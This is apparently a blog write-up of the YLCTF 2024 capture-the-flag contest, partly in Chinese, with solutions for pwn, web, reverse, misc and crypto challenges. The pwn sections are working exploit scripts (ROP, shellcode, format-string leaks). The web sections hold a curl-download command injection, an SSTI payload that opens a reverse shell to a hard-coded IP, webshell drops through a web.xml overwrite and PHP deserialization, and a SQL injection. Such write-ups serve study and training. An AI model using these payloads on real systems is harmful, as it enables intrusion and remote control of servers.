pwn
[Round 1] giaopwn
exp:
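# -*- coding: utf-8 -*-
"""giaopwn: ret2text ROP on a non-PIE x86-64 binary.

The vulnerable function lets 0x28 bytes of input run past the buffer and
saved rbp into the saved return address.  The chain placed there is
``pop rdi; ret`` -> pointer to the "cat flag" string -> the address the
author labelled ``system``.  All addresses are absolute because the binary
is non-PIE (0x400000 base) and are specific to the challenge binary.
"""
from pwn import *
# from LibcSearcher import *
#p = process("./pwn")
p = remote("challenge.yuanloo.com",24519)
elf = ELF("./pwn")
#libc = ELF("./libc.so.6")
context(arch=elf.arch, os=elf.os,log_level='debug')
#context.terminal = ["tmux", "splitw", "-h"]
vuln=0x4006A1        # not used by the chain; kept for reference
system=0x4006D2      # .text address (not the PLT stub) the author labelled system -- presumably a call-system site, verify in the disassembly
cat_flag=0x601048    # presumably the "cat flag" string in .data/.bss (0x601000 region of a non-PIE binary)
rdi_ret=0x400743     # pop rdi ; ret
# b'' literals throughout: ``'a'*0x28 + p64(...)`` is str + bytes and raises
# TypeError under Python 3 pwntools; b'' is plain str on Python 2, so this
# form works on both.
payload=b'a'*0x28                               # buffer + saved rbp
payload+=p64(rdi_ret)+p64(cat_flag)+p64(system)  # rdi = "cat flag"; then system
# gdb.attach(p,"b *0x4006BF")
# pause()
p.recvuntil(b"welcome to YLCTF")
p.send(payload)
p.interactive()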
[Round 1] ezstack
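# -*- coding: utf-8 -*-
"""ezstack: overflow back into vuln, then answer the command prompt with ``$0``.

Round one: 0x38 bytes reach the saved return address; it is overwritten
with a bare ``ret`` (keeps rsp 16-byte aligned for the next call) followed
by vuln's address, so the program runs the vulnerable function again.
Round two: the "input your command" prompt is answered with ``$0``.  In a
POSIX shell ``$0`` expands to the shell's own name, so running it as a
command starts a fresh shell -- a two-byte command that fits even a very
short input.  (The ``system`` address below is recorded but not used.)
"""
from pwn import *
# from LibcSearcher import *
#p = process("./ezstack")
p = remote("challenge.yuanloo.com",41853)
elf = ELF("./ezstack")
#libc = ELF("./libc.so.6")
context(arch=elf.arch, os=elf.os,log_level='debug')
#context.terminal = ["tmux", "splitw", "-h"]
vuln=0x401275
system=0x40134B    # unused here
ret=0x40101a       # ret gadget for stack alignment
# b'' literals: str + p64() bytes is a TypeError on Python 3 pwntools;
# b'' is plain str on Python 2, so this works on both.
payload=b"/bin/sh\x00"            # filler at the start of the buffer; not referenced by the chain
payload=payload.ljust(0x38,b'a')  # pad up to the saved return address
payload+=p64(ret)+p64(vuln)
# gdb.attach(p,"b *0x40134B")
# pause()
p.recvuntil(b"good stack")
p.send(payload)
payload=b"$0"
p.recvuntil(b"input your command")
p.send(payload)
p.interactive()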
[Round 1] ezorw
exp:
# -*- coding: utf-8 -*-
"""ezorw: send raw open/sendfile shellcode to the orw service.

The script only sends machine code after the banner, so the service
presumably executes whatever it receives.  Instead of the usual
open/read/write triple the code uses ``openat`` + ``sendfile``, which copies
the file to stdout inside the kernel -- handy if read/write are blocked by
a seccomp filter (the filter itself is not visible here).
"""
from pwn import *
# from LibcSearcher import *
#p = process("./pwn")
p = remote("challenge.yuanloo.com",24908)
elf = ELF("./pwn")
#libc = ELF("./libc.so.6")
context(arch=elf.arch, os=elf.os,log_level='debug')
#context.terminal = ["tmux", "splitw", "-h"]
BANNER = "welcome to YLCTF orw~"
# Assembly kept verbatim -- its exact byte length is what gets sent.
#   0x67616c662f2e  = "./flag" little-endian; pushed so rsp points at the string
#   rdi = -100      = AT_FDCWD, so openat() resolves "./flag" against the cwd
#   rsi = 3         assumes 0/1/2 are open, so the new fd is 3
#   rdx -> 0        sendfile's offset pointer (a zero pushed on the stack)
#   r10 = 0x100     at most 256 bytes are copied to fd 1 (stdout)
shellcode = asm('''
mov rax, 0x67616c662f2e ;// ./flag
push rax
mov rdi, -100
mov rsi, rsp
mov rdx, 0
mov rax, 257 ;// SYS_openat
syscall
mov rdi, 1
mov rsi, 3
push 0
mov rdx, rsp
mov r10, 0x100
push SYS_sendfile
pop rax
syscall
''')
p.recvuntil(BANNER)
p.send(shellcode)
p.interactive()
[Round 1] ezfmt
exp:
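# -*- coding: utf-8 -*-
"""ezfmt: format-string libc leak, then overflow into a one_gadget.

Round one: the input is both a format string (``%13$p`` prints the 13th
stack slot, which holds a libc address) and an overflow whose return
address sends execution back into vuln.  Round two: plain 0x28-byte
overflow returning into a one_gadget inside the leaked libc.
"""
from pwn import *
# from LibcSearcher import *
#p = process("./pwn")
p = remote("challenge.yuanloo.com",37695)
elf = ELF("./pwn")
libc = ELF("./libc-2.31.so")
context(arch=elf.arch, os=elf.os,log_level='debug')
#context.terminal = ["tmux", "splitw", "-h"]
vuln=0x4010B0
# b'' literals: str + p64() bytes is a TypeError on Python 3 pwntools;
# b'' is plain str on Python 2, so this works on both.
payload=b'%13$p'
payload=payload.ljust(0x28)+p64(vuln)   # space-pad to the saved rip, then re-enter vuln
p.recvuntil(b"welcome to YLCTF")
p.send(payload)
p.recvuntil(b'0x')
# 0x24083 is the offset of the leaked value inside the shipped libc-2.31
# (it is the usual __libc_start_main+243 return address in that build --
# recompute if the libc changes).  12 hex digits is the width of a 0x7f..
# userland address; int() accepts bytes on Python 3.
libc_base=int(p.recv(12),16)-0x24083
info("libc_base: "+hex(libc_base))
# A wrong offset shows up immediately as a non page-aligned base; fail
# loudly instead of jumping to garbage.
if libc_base & 0xfff:
    error("libc_base is not page aligned -- offset 0x24083 does not match this libc")
# gdb.attach(p,"b *0x401200")
# pause()
# Standard one_gadget offsets for glibc 2.31; index 1 is the one whose
# register constraints held at this return site.
ogg=libc_base+[0xe3afe,0xe3b01,0xe3b04][1]
payload=b'a'*0x28+p64(ogg)
p.recvuntil(b"welcome to YLCTF")
p.send(payload)
p.interactive()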
[Round 1] canary_orw
exp:
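# -*- coding: utf-8 -*-
"""canary_orw: defuse the canary check, then ``jmp rsp`` into flag-reading shellcode.

Three exchanges precede the final overflow: after "journey" an 8-byte
value (vuln's address) that presumably steers execution into vuln; after
"Sea" an 8-byte pad plus an address (0x601038); after "magic" an 8-byte
value (a ``ret`` gadget).  Together the last two look like an arbitrary
8-byte write that stores ``ret`` at 0x601038 -- presumably the
__stack_chk_fail GOT slot, so a smashed canary no longer aborts.  Confirm
against the binary.  The final 0x28-byte overflow returns into ``jmp rsp``
and the shellcode that follows it on the stack does open/read/write on
./flag.
"""
from pwn import *
# from LibcSearcher import *
#p = process("./pwn")
p = remote("challenge.yuanloo.com",49187)
elf = ELF("./pwn")
libc = ELF("./libc-2.31.so")
context(arch=elf.arch, os=elf.os,log_level='debug')
#context.terminal = ["tmux", "splitw", "-h"]
vuln=0x400820
main=0x400730          # unused
ret=0x4006ae           # ret gadget written to stack_chk
stack_chk=0x601038     # presumably __stack_chk_fail@got -- verify
pop_rdi=0x400a63       # unused ROP gadgets, kept for reference
pop_rsi_r15=0x400a61
popp=0x400a5c #pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# next() works on both Python 2 and 3; the original ``.next()`` is Py2-only.
jmp_rsp=next(elf.search(asm('jmp rsp;'),executable=True))
payload=p64(vuln)
p.recvuntil(b"journey\n")
p.send(payload)
# b'' literals: str + p64() bytes is a TypeError on Python 3 pwntools;
# b'' is plain str on Python 2, so this works on both.
payload1=b'a'*8+p64(stack_chk)
p.recvuntil(b'Sea\n')
p.send(payload1)
p.recvuntil(b'magic\n')
p.send(p64(ret))
# gdb.attach(p,"b *0x4008D5")
# pause()
# Assembly kept verbatim.  0x67616c662f2e = "./flag"; open(path, 0, 0);
# the read assumes the new fd is 3; up to 0xff bytes are read onto the
# stack and written to stdout.
shellcode = asm("""
mov rax, 0x67616c662f2e
push rax
mov rdi, rsp
xor edx, edx
xor esi, esi
push SYS_open
pop rax
syscall
push 3
pop rdi
push 0xFF /* read size */
pop rdx
mov rsi, rsp
push SYS_read
pop rax
syscall
push 1
pop rdi
push 0xFF /* write size */
pop rdx
mov rsi, rsp
push SYS_write
pop rax
syscall
""")
payload3=b'a'*0x28+p64(jmp_rsp)+shellcode   # after ret, rsp points at the shellcode
p.recvuntil(b'go!\n')
p.send(payload3)
p.interactive()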
[Round 1] ezheap(mp)
mp_.tcache_bins基本漏洞利用 - P3troL1er 的个人博客
以上这一通操作能够实现的前提是:先通过 unsorted bin attack 或 large bin attack 等方式把 mp_.tcache_bins 改成一个很大的值,这样原本超出 tcache 范围的大 chunk 也会走 tcache 的分配/释放路径。
mp_.tcache_bins 位于 mp_ + 0x50(十进制 80)。large bin attack 实际写入的是 victim->bk_nextsize->fd_nextsize,而 fd_nextsize 在 chunk 内的偏移是 0x20,所以要让 mp_ + 0x50 被覆盖,attack 的目标地址要填 mp_ + 0x50 - 0x20 = mp_ + 0x30。注意 0x50 这个偏移与 glibc 版本相关,换版本前要在对应 libc 里重新核对 mp_ 的布局。
[Round 2] shortshell
exp:
# -*- coding: utf-8 -*-
"""shortshell: a two-instruction stub that pivots into the backdoor.

Only a few bytes of shellcode fit, so instead of a full payload the stub
adjusts the low byte of rbx and jumps there.  That presumably relies on rbx
holding an address 0x1c above the backdoor (0x401270) when the input is
executed -- a register state the author would have checked under gdb at
0x4011FD; the script itself does not verify it.
"""
from pwn import *
p=remote("challenge.yuanloo.com",44631)
#p = process("./pwn")
elf = ELF("./pwn")
context(arch=elf.arch, os=elf.os, log_level='debug')
buf = 0x404069          # input buffer address -- reference only, unused below
backdoor = 0x401270     # where the stub lands after rbx -= 0x1c
# gdb.attach(p,"b *0x4011FD")
# pause()
STUB = '''
sub bl,0x1c
jmp rbx
'''
payload = asm(STUB)     # 5 bytes: sub bl, imm8 (3) + jmp rbx (2)
p.recvuntil("YLCTF-PWN")
p.send(payload)
p.interactive()
[Round 2] ezstack2
exp:
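# -*- coding: utf-8 -*-
"""ezstack2: two-round ret2libc -- leak puts@got, resolve libc, ret2system.

Round one: 0x38 bytes reach the saved return address; the chain calls
puts(puts@got) to print puts' runtime address and then returns to 0x40070A
(presumably back into the vulnerable read) for a second round.  The leak
is fed to LibcSearcher to pick a candidate libc; round two calls
system("/bin/sh") with a ``ret`` in front for 16-byte stack alignment.
"""
from pwn import *
from LibcSearcher import *
#p = process("./pwn")
p = remote("challenge.yuanloo.com",34014)
elf = ELF("./pwn")
#libc = ELF("./libc.so.6")
context(arch=elf.arch, os=elf.os,log_level='debug')
#context.terminal = ["tmux", "splitw", "-h"]
# gdb.attach(p,"b *0x40070A")
# pause()
puts_got=0x601018    # == elf.got['puts']
puts_plt=0x400580    # == elf.plt['puts']
vuln=0x400757        # unused; 0x40070A below is the re-entry point actually used
pop_rdi=0x400823     # pop rdi ; ret
ret=0x40056e         # ret -- aligns rsp before system()
# b'' literals: str + p64() bytes is a TypeError on Python 3 pwntools;
# b'' is plain str on Python 2, so this works on both.
payload=b'a'*0x38+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(0x40070A)
p.recvuntil(b"stack")
p.send(payload)
# puts() emits only the significant bytes of the address (no leading
# zeros); a userland libc address starts with 0x7f, which therefore works
# as the delimiter.  Take the last 6 bytes and zero-extend to 8.
puts=u64(p.recvuntil(b'\x7F')[-6:].ljust(8,b'\x00'))
libc=LibcSearcher("puts",puts)
libc_base=puts-libc.dump("puts")
system=libc_base+libc.dump("system")
bin_sh=libc_base+libc.dump("str_bin_sh")
payload=b'a'*0x38+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system)
p.recvuntil(b"stack")
p.send(payload)
p.interactive()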
[Round 3] Secret
exp:
# -*- coding: utf-8 -*-
"""Secret: the check is a fixed password; send it and take the shell.

The password string presumably comes straight out of the binary (a static
string compare); nothing else is needed.
"""
from pwn import *
# from LibcSearcher import *
#p = process("./pwn")
p = remote("challenge.yuanloo.com",32005)
elf = ELF("./pwn")
#libc = ELF("./libc.so.6")
context(arch=elf.arch, os=elf.os,log_level='debug')
#context.terminal = ["tmux", "splitw", "-h"]
PROMPT = "Enter the secret password: "
payload='SuperSecretPassword\n'   # newline included: the program presumably reads a line
p.sendafter(PROMPT,payload)
p.interactive()
[Round 3] ezstack3
exp:
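# -*- coding: utf-8 -*-
"""ezstack3 (x86-32): leak the saved ebp, then stack-pivot into system("/bin/sh").

Round one fills the 0x30-byte buffer completely; the program echoes it back
and, with no terminator, the next 4 bytes come along too.  The author reads
those as the saved ebp, which pins the buffer's own address at ebp - 0x40.
Round two lays a fake frame in the buffer and overwrites saved ebp with the
buffer address and the return address with ``leave; ret``: the second
``leave`` moves esp onto the fake frame, and ``ret`` lands in system with
"/bin/sh" as its argument.
"""
from pwn import *
# from LibcSearcher import *
#p = process("./pwn")
p = remote("challenge.yuanloo.com",49612)
elf = ELF("./pwn")
#libc = ELF("./libc.so.6")
context(arch=elf.arch, os=elf.os,log_level='debug')
#context.terminal = ["tmux", "splitw", "-h"]
leave_ret=0x08049324
system=elf.sym['system']    # resolved from the binary's own symbols, so no libc leak is needed
# gdb.attach(p,'b *0x080492F3\nc')
# pause()
# b'' literals: str + p32() bytes is a TypeError on Python 3 pwntools;
# b'' is plain str on Python 2, so this works on both.
payload=b'a'*0x30
p.sendafter(b'Welcome to YLCTF stack3',payload)
p.recvuntil(b'a'*0x30)
ebp=u32(p.recv(4))
ss=ebp-0x40        # address of the input buffer
binsh=ss+0x10      # "/bin/sh" sits 0x10 into the fake frame below
info("ebp: "+hex(ebp))
# Fake frame laid out at ss:
#   +0x00 'aaaa'     popped into ebp by the pivoting leave
#   +0x04 system     consumed by the following ret
#   +0x08 0          system's (fake) return address
#   +0x0c binsh      system's argument
#   +0x10 "/bin/sh"
payload=b'aaaa'+p32(system)+p32(0)+p32(binsh)+b'/bin/sh'
payload=payload.ljust(0x30,b'\x00')
payload+=p32(ss)+p32(leave_ret)   # saved ebp -> ss ; ret -> leave;ret
p.send(payload)
p.interactive()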
web
[Round 1] Disal
访问 /robots.txt
/flag.php
POST传参
a=1000000aaaaaa&b=1235a
[Round 1] shxpl
用 URL 编码的换行符 %0a 作为命令分隔符绕过对 ; | && 等符号的过滤,实现多命令执行;从 payload 看空格也不可用,用 %09(tab)代替空格。
123%0acurl%09http://ip:port/1.sh%09-o%091.sh
先把一个只写了 cat /f* 的脚本从自己控制的主机(上面 ip:port)下载到目标上,再用 sh 执行它,这样被过滤的命令本身不必出现在请求里:
123%0ash%091.sh
[Round 1] Injct
用 fenjing(Jinja2 SSTI 自动绕过工具)直接跑出能命令执行的 payload,再用它起一个 python 反弹 shell。下面 payload 里的八进制转义串解码后是 `python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.121.123.96",250));os…`,复现时要把地址和端口换成自己的监听端;另外贴出的 payload 在 `;os` 处看起来被截断了,后半段(通常是三次 os.dup2 再调用 /bin/sh)需要自行补全。payload 如下
{%if(((cycler.next|attr(('%c'%95)*2+'globals'+
('%c'%95)*2)|attr(('%c'%95)*2+'getitem'+('%c'%95)*2)(('%c'%95)*2+'builtins'+
('%c'%95)*2)|attr(('%c'%95)*2+'getitem'+('%c'%95)*2)(('%c'%95)*2+'i''mport'+
('%c'%95)*2))('os')|attr('p''open'))
('\\160\\171\\164\\150\\157\\156\\40\\55\\143\\40\\47\\151\\155\\160\\157\\162\\
164\\40\\163\\157\\143\\153\\145\\164\\54\\163\\165\\142\\160\\162\\157\\143\\14
5\\163\\163\\54\\157\\163\\73\\163\\75\\163\\157\\143\\153\\145\\164\\56\\163\\1
57\\143\\153\\145\\164\\50\\163\\157\\143\\153\\145\\164\\56\\101\\106\\137\\111
\\116\\105\\124\\54\\163\\157\\143\\153\\145\\164\\56\\123\\117\\103\\113\\137\\
123\\124\\122\\105\\101\\115\\51\\73\\163\\56\\143\\157\\156\\156\\145\\143\\164
\\50\\50\\42\\64\\67\\56\\61\\62\\61\\56\\61\\62\\63\\56\\71\\66\\42\\54\\62\\65
\\60\\51\\51\\73\\157\\163').read())%}{%endif%}
[Round 1] TOXEC
上传xml
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd"
version="3.1">
<servlet-mapping>
<servlet-name>default</servlet-name>
<url-pattern>/</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>jsp</servlet-name>
<url-pattern>*.jsp</url-pattern>
<url-pattern>*.txt</url-pattern>
<url-pattern>*.xml</url-pattern>
</servlet-mapping>
</web-app>
先上传 shell.txt,利用重命名功能中的目录穿越把它移到 web 根目录;再同样通过重命名把上面这份 web.xml 写到 WEB-INF/ 下覆盖原配置。新的 web.xml 把 *.txt、*.xml 也映射给 jsp servlet,容器重新加载该应用的 web.xml 后,shell.txt 就会按 JSP 执行,从而 getshell。
[Round 1] pExpl
<?php
class FileHandler {
// Mirrors the target application's FileHandler; only the property names
// and values matter, since this script just serialize()s the chain for the
// target to unserialize().  fileName is pointed at a User object below so
// that (presumably) the code path that handles the file name touches that
// object instead of a plain string.
public $fileHandle="1";
public $fileName;
}
class Logger {
// Sink of the chain: the log entry is presumably appended to $logFile, so
// pointing logFile at shell.php turns the log write into a webshell drop.
// The entry content comes from User::$param below.
public $lastEntry;
public $logFile="shell.php";
}
class User {
// $param carries the PHP written into the log: a short-tag echo that runs
// `cat /f*` when shell.php is later requested.
// $data is set below to the array callable [Logger, "info"], i.e.
// Logger->info(...); the exact trigger lives in the target source, which
// is not shown here.
public $userData;
public $param="<?=`cat /f*`?>";
public $data;
}
// Assemble the chain bottom-up: FileHandler -> User (via fileName)
//   -> [Logger, "info"] array callable (via User::$data).
$logger = new Logger();
$user = new User();
$user->data = array($logger, "info");
$a = new FileHandler();
$a->fileName = $user;
// Emit the serialized chain; the target presumably unserialize()s the
// first array element.
echo serialize(array($a, ""));
通过log写恶意代码进文件,访问执行拿flag
[Round 1] sInXx
联合注入。逗号被过滤,用 JOIN 把多个单列子查询拼成多列来绕过;表名大概是 information_schema 被过滤后,通过 sys 库里的视图查到的(作者没写具体名字,常见的是 sys.schema_table_statistics_with_buffer 或 sys.schema_auto_increment_columns)。后面是无列名注入:这里猜 DataSyncFLAG 表是 2 列——UNION 左边用 JOIN 凑出 5 列,右边 3 个常量列再 JOIN (SELECT * FROM DataSyncFLAG) 也必须凑成 5 列,所以该表恰好 2 列;再用外层子查询把结果取出来拿到 flag,payload 如下
123123123'/**/UNION/**/SELECT/**/*/**/FROM/**/(SELECT/**/*/**/FROM/**/((SELECT/*
*/5)E/**/JOIN/**/(SELECT/**/1)A/**/JOIN/**/(SELECT/**/2)B/**/JOIN/**/(SELECT/**/
3)C/**/JOIN/**/(SELECT/**/4)D)/**/UNION/**/SELECT/**/*/**/FROM/**/((SELECT/**/1)
A/**/JOIN/**/(SELECT/**/2)B/**/JOIN/**/(SELECT/**/3)D/**/JOIN(SELECT/**/*/**/FRO
M/**/DataSyncFLAG)C))AS/**/A#
[Round 1] FastDB
jdbc反序列化读文件
Reverse
[Round 1] xor
UPX去壳
nc 连上去
# 已知的加密字符
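# Ciphertext bytes recovered from the binary: each flag byte XORed with a
# single-byte key.  The last element (0x1c) is the C string's NUL
# terminator XORed with the key and decodes to '\x00'.
encrypted_hex_values = [
0x45, 0x50, 0x5f, 0x48, 0x5a, 0x67, 0x7e, 0x2c, 0x24, 0x2f, 0x2b, 0x7d, 0x7d, 0x7f, 0x31, 0x2f,
0x2b, 0x25, 0x7f, 0x31, 0x28, 0x2d, 0x2b, 0x78, 0x31, 0x7e, 0x25, 0x28, 0x25, 0x31, 0x79, 0x24,
0x2a, 0x2f, 0x78, 0x2e, 0x2b, 0x7e, 0x7a, 0x7d, 0x2f, 0x2d, 0x61, 0x1c
]
xor_key = 0x1C
decrypted_chars = [chr(value ^ xor_key) for value in encrypted_hex_values]
# Drop the trailing NUL: the original join kept it inside the flag string,
# which breaks copy/paste and equality checks against the real flag.
decrypted_flag = ''.join(decrypted_chars).rstrip('\x00')
print(f"Decrypted FLAG: {decrypted_flag}")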
#YLCTF{b0837aac-379c-417d-b949-e863d27bfa31}
[Round 1] ezgo
exp:
# Ciphertext recovered from the binary: byte i of the flag XORed with (i + 53).
encrypted_values = [
108, 122, 116, 108, 127, 65, 10, 93, 94, 88, 10, 118, 116, 117, 110, 33,
119, 112, 127, 101, 125, 115, 40, 41, 96, 119, 42, 103, 102, 127, 99, 98,
54, 51, 51, 105, 96, 107, 104, 108, 100, 58, 34
]
# XOR is its own inverse, so re-applying the position-dependent key
# (index + 53) recovers the plaintext byte at that index.
decrypted_flag = "".join(
    chr(byte ^ (pos + 53)) for pos, byte in enumerate(encrypted_values)
)
print(f"Decrypted FLAG: {decrypted_flag}")
#YLCTF{1acf5657-e268-49ce-9e77-06ced191309d}
[Round 1]xorplus
exp:
key = "welcometoylctf"
keylen = len(key)
# --- Key scheduling: RC4's KSA with an extra constant 1300 in the index
# update (1300 == 20 mod 256, so it is just a +20 twist).
S = list(range(256))
sched_key = [ord(key[i % keylen]) for i in range(256)]   # key repeated out to 256 bytes
j = 0
for i in range(256):
    j = (j + S[i] + sched_key[i] + 1300) % 256
    S[i], S[j] = S[j], S[i]
cipher_bytes = [
0x91, 0x86, 0x1b, 0x2d, 0x9e, 0x6f, 0x27, 0x2e, 0x78, 0xf3, 0xef, 0xf1,
0x02, 0x93, 0x22, 0x15, 0x3c, 0xec, 0x5d, 0x2d, 0x80, 0x29, 0x4a, 0x16,
0x6c, 0x76, 0x4a, 0x53, 0x53, 0x26, 0xb8, 0x95, 0x38, 0x4b, 0x28, 0xc5,
0xb6, 0x7c, 0x26, 0xf9, 0xb7, 0x34, 0xa6
]
# --- Keystream generation: the standard RC4 PRGA.  The binary produced
# each ciphertext byte as ((p ^ ks) + 20) & 0xff, so undo the +20 first.
i = j = 0
plaintext = ''
for cipher_byte in cipher_bytes:
    i = (i + 1) % 256
    j = (j + S[i]) % 256
    S[i], S[j] = S[j], S[i]
    keystream_byte = S[(S[i] + S[j]) % 256]
    plaintext += chr(((cipher_byte - 20) % 256) ^ keystream_byte)
print(plaintext)
#YLCTF{b121fff3-1723-46f3-a891-336c8920e2b0}
Misc
[签到] 打卡小能手
关注 源鲁安全实验室 微信公众号 ,发送 2024YLCTF 即可获得flag。
[Round 1] hide_png
盯着看
[Round 1] pngorzip
# First pass: let zsteg list every bit-plane/channel combination it
# recognises, to spot the one carrying a payload.
zsteg out.png
# Second pass: pull out the payload hidden in the lowest bit of the R,G,B
# channels scanned in xy order; the extracted bytes form a zip archive.
zsteg --extract 'b1,rgb,lsb,xy' out.png > hidden.zip
提取到一个文件夹 里面有flag.txt 需要密码
掩码爆破
密码
114514giao
Crypto
[Round 1] signrsa
exp:
from math import gcd
from Crypto.Util.number import inverse, long_to_bytes
n1 = 18674375108313094928585156581138941368570022222190945461284402673204018075354069827186085851309806592398721628845336840532779579197302984987661547245423180760958022898546496524249201679543421158842103496452861932183144343315925106154322066796612415616342291023962127055311307613898583850177922930685155351380500587263611591893137588708003711296496548004793832636078992866149115453883484010146248683416979269684197112659302912316105354447631916609587360103908746719586185593386794532066034112164661723748874045470225129298518385683561122623859924435600673501186244422907402943929464694448652074412105888867178867357727
n2 = 20071978783607427283823783012022286910630968751671103864055982304683197064862908267206049336732205051588820325894943126769930029619538705149178241710069113634567118672515743206769333625177879492557703359178528342489585156713623530654319500738508146831223487732824835005697932704427046675392714922683584376449203594641540794557871881581407228096642417744611261557101573050163285919971711214856243031354845945564837109657494523902296444463748723639109612438012590084771865377795409000586992732971594598355272609789079147061852664472115395344504822644651957496307894998467309347038349470471900776050769578152203349128951
e = 65537
c = 18186043981640742587831735685230869056429841327227360947626385001427807283361957578241651560174597207750668926022267670343836724867578053461114216055826075585178534403266944658333171445071313079978337446983170242033118195683464152141991719189696843718099978147426803145961427177093551496104187045340099566153999306407628841541835695635098156090786380252846882564002485632325584847521363388800844339219761158626951357694038861754248167814264698304489232076868231291268133060179767629354884625199303019585969602836413525574191125419439606177388294401887882051881718181803494920697338807801036268111770302186752733596353
# The two moduli share a prime, so a single gcd factors both of them.
# The decryption order (n2 first, then n1) means the ciphertext was
# presumably produced as c = (m^e mod n1)^e mod n2.
p = gcd(n1, n2)
if p <= 1:
    print("未找到公因数")
else:
    print("找到公因数 p:", p)
    q1, q2 = n1 // p, n2 // p
    d1 = inverse(e, (p - 1) * (q1 - 1))
    d2 = inverse(e, (p - 1) * (q2 - 1))
    c1 = pow(c, d2, n2)     # peel off the outer (n2) layer
    m = pow(c1, d1, n1)     # then the inner (n1) layer
    flag = long_to_bytes(m).decode()
    print("Flag为:", flag)
#YLCTF{dcfccd2b-e565-4004-9fcc-16a2e3c5d8f7}
[Round 3] ezlcg
python:
from pwn import *
# The service is x86-64 Linux; debug logging shows every exchange.
context.update(os='linux', arch='amd64', log_level='debug')
p = remote('challenge.yuanloo.com', 37437)
def MMI(A, n, s=1, t=0, N=0):
    """Modular inverse of *A* modulo *n* via the extended Euclidean algorithm.

    Returns x in [0, n) with A*x == 1 (mod n).  The extra parameters mirror
    the recursive original (running Bezout coefficients and the original
    modulus) and exist only for signature compatibility; callers pass two
    arguments.  If A and n are not coprime no inverse exists and the result
    is meaningless; ``n < 2`` with the default ``N=0`` raises
    ZeroDivisionError, exactly like the recursive version.
    """
    modulus = N
    a, m = A, n
    while m >= 2:
        modulus = modulus or m   # remember the original modulus on the first step
        a, m, s, t = m, a % m, t, s - (a // m) * t
    return t % modulus
def lcg1(a, b, n, c):
    """Challenge one: a, b, n and one output c are known; return the seed.

    The step is c = (a*seed + b) mod n, so seed = a^-1 * (c - b) mod n.
    """
    return (MMI(a, n) * (c - b)) % n
def lcg2(a, n, c1, c2):
    """Challenge two: a and n known, b unknown, two consecutive outputs given.

    c2 = a*c1 + b (mod n) yields the increment b; the seed then follows
    from c1 exactly as in lcg1.
    """
    increment = (c2 - a * c1) % n
    return (MMI(a, n) * (c1 - increment)) % n
def lcg3(n, c1, c2, c3):
    """Challenge three: only n and three consecutive outputs are known.

    Differencing consecutive outputs cancels b: c3 - c2 = a*(c2 - c1)
    (mod n) gives the multiplier a (requires c2 - c1 invertible mod n);
    b and the seed then follow as in lcg2.
    """
    multiplier = ((c3 - c2) * MMI(c2 - c1, n)) % n
    increment = (c2 - multiplier * c1) % n
    return (MMI(multiplier, n) * (c1 - increment)) % n
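def _recv_int(conn):
    """Read the next ``name = value`` line from *conn* and return value as an int.

    The server prints each parameter on its own line as ``<name> = <number>``;
    only the text after the first ``=`` is used.  int() accepts bytes and
    tolerates the trailing newline, so no decode/strip is needed.
    """
    return int(conn.recvuntil(b'\n').split(b'=')[1])


def _play(conn, rounds, banner, nparams, solve):
    """Answer *rounds* rounds of one challenge.

    Each round waits for *banner* (the original loop waits for it every
    round, so the server presumably reprints it), reads *nparams* values in
    the order the server prints them, and sends ``solve(*values)`` as the
    seed.  str(...).encode() keeps the send bytes-typed on Python 3.
    """
    for _round in range(rounds):
        conn.recvuntil(banner)
        values = [_recv_int(conn) for _i in range(nparams)]
        conn.sendlineafter(b'seed =', str(solve(*values)).encode())


# The parameter order matches each solver's signature:
#   one:   a, b, n, c      two:   a, n, c1, c2      three: n, c1, c2, c3
_play(p, 50, b"Challenge one,50 Round\n", 4, lcg1)
_play(p, 30, b"Challenge two,30 Round\n", 4, lcg2)
_play(p, 10, b"Challenge three,10 Round\n", 4, lcg3)
p.interactive()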
[Round 3] repeat
from Crypto.Util.number import *
MSG_PREFIX = b"welcometoYLCTFYL"
MODULUS = 0xba94dc08d76e6f761431a7d34997a6dec45409b61ed1faea119f1121642a62df
en = bytes.fromhex("28e2f5f44c8e22f6026aaac8425d5bf2b1a225987772212bb45eadd0612ca1efa23c7cb1dd9500c0059f8c9a57c349efbc72608db42b0e3255fd99621a9038f14d1b7dd08591a92c07d357b88cfff703cf48fb7940b769d7447b49bb953848dc113c00c5f31d346034585b461157b9a59d0c81936709186b24abe014bbf74810")
# The ciphertext is a run of 32-byte blocks, each (plaintext * key * 2024)
# mod MODULUS, with the key dropping by 0x114514 from block to block.  The
# first 16 plaintext bytes are known, so block 0 gives the initial key;
# every block is then recovered by dividing that key back out.
C = [en[32*i:32*i+32] for i in range(len(en)//32)]
key = (bytes_to_long(C[0]) * inverse(bytes_to_long(MSG_PREFIX[:16]) * 2024, MODULUS)) % MODULUS
pieces = []
for block in C:
    pieces.append(long_to_bytes((bytes_to_long(block) * inverse(key * 2024, MODULUS)) % MODULUS))
    key -= 0x114514
msg = b"".join(pieces)
print(msg)
# YLCTFYLCTF{027db262-844f-4d91-849e-6eab6ce0aedf}
From: https://www.cnblogs.com/cosyQAQ/p/18558692